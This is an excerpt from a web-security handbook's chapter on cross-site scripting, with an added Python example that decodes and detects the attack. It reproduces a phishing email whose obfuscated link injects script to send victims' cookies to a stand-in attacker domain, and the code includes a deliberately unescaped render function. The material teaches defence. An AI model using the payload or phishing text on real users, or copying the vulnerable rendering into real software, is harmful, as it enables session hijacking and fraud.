The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws



Chapter 12: Attacking Other Users (page 381)

assumed to contain code, rather than data, and so cross-domain access should not lead to disclosure of any sensitive information. As you will see, this assumption breaks down in certain situations, leading to cross-domain attacks.

■ A page residing on one domain cannot read or modify the cookies or other DOM data belonging to another domain (as described in the previous example).

The second reason why the attacker goes to the trouble of exploiting the XSS vulnerability is that step 2 of the process just described is far likelier to succeed if the URL crafted by the attacker starts with wahh-app.com rather than wahh-attacker.com. Suppose that the attacker attempts to snare his victims by sending out millions of emails like the following:

From: "WahhApp Customer Services"
To: "John Smith"
Subject: Complete our customer survey and receive a $5 credit

Dear Valued Customer,

You have been selected to participate in our customer survey. Please complete our easy 5 question survey, and in return we will credit $5 to your account.

To access the survey, please log in to your account using your usual bookmark, and then click on the following link:

https://wahh-app.com/%65%72%72%6f%72%2e%70%68%70?message%3d%3c%73%63
%72ipt>var+i=ne%77+Im%61ge%3b+i.s%72c="ht%74%70%3a%2f%2f%77ahh-att
%61%63%6ber.co%6d%2f"%2bdocum%65%6e%74%2e%63ookie;

Many thanks and kind regards,
Wahh-App Customer Services

Even to someone who is aware of the threats posed by phishing-style scams, this email is actually fairly reassuring:

■ They are told to access their account using their usual bookmark.

■ The link they are invited to click on points to the correct domain name used by the application.

■ The URL has been obfuscated from the version in step 2, by URL-encoding selected characters so that its malicious intent is not immediately obvious.

■ The HTTPS security check will succeed, because the URL provided by the attacker is actually delivered by the authentic wahh-app.com server.
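The following Python is an added example and not code from the book. It takes the obfuscated link from the email above, decodes it the way the receiving server will (so the script it actually carries becomes visible), flags it with a decode-then-inspect check of the kind a mail gateway or proxy filter would apply, and places the reflection pattern that error.php is assumed to use beside an output-encoded version of the same page. The benign comparison URL, the marker list and both render functions are constructed for illustration; the book does not show error.php's source.

```python
import html
from urllib.parse import urlsplit, unquote, unquote_plus

# The obfuscated link from the phishing email above (the book's own example URL).
PHISHING_URL = (
    'https://wahh-app.com/%65%72%72%6f%72%2e%70%68%70?message%3d%3c%73%63'
    '%72ipt>var+i=ne%77+Im%61ge%3b+i.s%72c="ht%74%70%3a%2f%2f%77ahh-att'
    '%61%63%6ber.co%6d%2f"%2bdocum%65%6e%74%2e%63ookie;'
)

# Constructed benign URL for comparison (assumption: error.php reflects ?message=).
BENIGN_URL = 'https://wahh-app.com/error.php?message=Invalid+account+number'

# Constructed marker list: strings that indicate script injection once decoded.
SCRIPT_MARKERS = ('<script', 'javascript:', 'onerror=', 'onload=')


def normalise_url(url: str) -> str:
    """Percent-decode path and query so the link reads as the server will
    interpret it. A bare '+' in the query is a form-encoded space, while
    '%2b' is a literal plus, so the query is decoded with unquote_plus and
    the path with plain unquote."""
    parts = urlsplit(url)
    path = unquote(parts.path)
    query = unquote_plus(parts.query)
    base = f'{parts.scheme}://{parts.netloc}{path}'
    return f'{base}?{query}' if query else base


def reflected_message(url: str) -> str:
    """Value of the 'message' parameter as the application would see it.
    The query is decoded before it is split, because the attacker encoded
    the '=' itself (%3d) to hide the parameter boundary."""
    query = unquote_plus(urlsplit(url).query)
    name, _, value = query.partition('=')
    return value if name == 'message' else ''


def looks_like_script_injection(url: str) -> bool:
    """Decode first, then inspect: a check on the raw URL would miss this
    payload, because '<script' never appears literally in it."""
    decoded = normalise_url(url).lower()
    return any(marker in decoded for marker in SCRIPT_MARKERS)


def render_error_vulnerable(message: str) -> str:
    """The reflection the attack relies on: the parameter is copied straight
    into the page, so any markup in it becomes live HTML."""
    return '<p>Error: ' + message + '</p>'


def render_error_safe(message: str) -> str:
    """HTML-encode the value at the point it is inserted into the page; the
    browser then displays the text literally and executes nothing."""
    return '<p>Error: ' + html.escape(message, quote=True) + '</p>'


if __name__ == '__main__':
    print(normalise_url(PHISHING_URL))
    print('script injection:', looks_like_script_injection(PHISHING_URL))
    print(render_error_vulnerable(reflected_message(PHISHING_URL)))
    print(render_error_safe(reflected_message(PHISHING_URL)))
```

The two render functions differ only in where encoding happens: the safe version encodes at the point of insertion into HTML, which is the control that makes the reflected value harmless regardless of how the link was obfuscated on the way in.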


Download 5,76 Mb.

Do'stlaringiz bilan baham:
1   ...   651   652   653   654   655   656   657   658   ...   875




Ma'lumotlar bazasi mualliflik huquqi bilan himoyalangan ©hozir.org 2024
ma'muriyatiga murojaat qiling

kiriting | ro'yxatdan o'tish
    Bosh sahifa
юртда тантана
Боғда битган
Бугун юртда
Эшитганлар жилманглар
Эшитмадим деманглар
битган бодомлар
Yangiariq tumani
qitish marakazi
Raqamli texnologiyalar
ilishida muhokamadan
tasdiqqa tavsiya
tavsiya etilgan
iqtisodiyot kafedrasi
steiermarkischen landesregierung
asarlaringizni yuboring
o'zingizning asarlaringizni
Iltimos faqat
faqat o'zingizning
steierm rkischen
landesregierung fachabteilung
rkischen landesregierung
hamshira loyihasi
loyihasi mavsum
faolyatining oqibatlari
asosiy adabiyotlar
fakulteti ahborot
ahborot havfsizligi
havfsizligi kafedrasi
fanidan bo’yicha
fakulteti iqtisodiyot
boshqaruv fakulteti
chiqarishda boshqaruv
ishlab chiqarishda
iqtisodiyot fakultet
multiservis tarmoqlari
fanidan asosiy
Uzbek fanidan
mavzulari potok
asosidagi multiservis
'aliyyil a'ziym
billahil 'aliyyil
illaa billahil
quvvata illaa
falah' deganida
Kompyuter savodxonligi
bo’yicha mustaqil
'alal falah'
Hayya 'alal
'alas soloh
Hayya 'alas
mavsum boyicha


yuklab olish